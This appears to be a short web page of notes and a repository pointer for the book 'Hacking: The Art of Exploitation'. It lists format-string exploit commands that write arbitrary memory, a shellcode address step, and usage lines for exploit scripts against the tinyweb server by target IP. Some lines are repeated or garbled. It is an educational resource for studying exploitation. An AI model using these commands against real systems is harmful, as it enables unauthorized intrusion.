Hacking The Art Of Exploitation notes with samples and demos.

Hacking The Art Of Exploitation notes with samples and demos.

Hacking The Art Of Exploitation notes with samples and demos. List of File and inside Folder.

ShellCode will be at 0x4

ShellCode will be at 0x4

1. Exploitation:
– Generalized Exploit Techniques
– Buffer Overflows
– Stack-Based Buffer Overflow Vulnerabilities
– experimenting with BASH + Perl
– Overflows in Other Segments
– Overflowing Function Pointers
– Format Strings
– vDirect Parameter access
– Detours with .dtors

DissAssembly of section .plt

DissAssembly of section .plt

– Overwriting the Global Offset Table

2.Networking Exploitation:

Snigging on device eth0 Sample

Sniffing on device eth0 Sample

– osi Model
– Sockets
– Network Byte Order
– Internet address Conversion
– A Simple Server Example
– A Web Client Example
– A Tinyweb Server
– Peeling Back the Lower Layers:
— Data-link Layer
— Network Layer
— Transport Layer
– Network Sniffing:
— Raw Socket Sniffer
— libpcap sniffer
— Decoding the Layers
— Active Sniffing

Installation:
– git clone https://github.com/surfuga/HackingTheArtOfExploitation-notes
– cd HackingTheArtOfExploitation-notes/ipspoofer/booksrc
– compile all (one by one, what do you need)

Example Writing to Arbitrary Memory Addresses:
– gcc -o fmt_vuln fmt_vuln.c
– ./fmt_vuln $(printf “\\x94\\x97\\x04x08\\x95\\x97\\x04x08\\x96\\x97\\x04x08\\x97\\x97\\x04x08”)%x%x%x%n%n%_$(perl -e ‘print “A”x220’)_ n%nmemorys
– ./fmt_vuln $(printf “\\x94\\x97\\x04x08JUNK\\x95\\x97\\x04x08JUNK\\x96\\x97\\x04x08JUNK\\x97\\x97\\x04x08” )%x%x%161x%n%222x%n%91x%n%258%n

– gdb -q –batch -ex “p 0xaa – 52 + 8”

– gdb : $1 = 126

– ./getenvaddr SHELLCODE ./fmt_vuln
– SHELLCODE will be at 0x4

./notetaker BBBB.%x.%x.%x.%x
output:

Debug Buffer

Debug Buffer

[DEBUG] buffer @ 0x9ccf008: ‘BBBB.%x.%x.%x.%x’
[DEBUG] datafile @ 0x9ccf070: ‘/var/notes’
[DEBUG] file descriptor is 3
Note has been saved

Network exploitation:
First Installation
– sudo apt-get install smbfs\
– sudo mkdir /mnt/cifs\
– sudo mount -t cifs //ip/sahrefolder /mnt/cifs -o username=\’85,password=\’85,domain=…

Example Network Sniffing
– gcc -o pcap_sniff pcap_sniff.c -l pcap
– ./pcap_sniff
Decode:
– gcc -o decode_sniff decode_sniff.c -l pcap
– ./decode_sniff

Bash File Usage:
Usage: ./xtool_tinywebd_cback.sh <shellcode file> <target IP>
Usage: ./xtool_tinywebd_reuse.sh <shellcode file> <target IP>
Usage: ./xtool_tinywebd.sh <shellcode file> <target IP>
Usage: ./xtool_tinywebd_silent.sh <shellcode file> <target IP>
Usage: ./xtool_tinywebd_spoof.sh <shellcode file> <target IP>
Usage: ./xtool_tinywebd_steath.sh <shellcode file> <target IP>

Source : https://github.com/surfuga/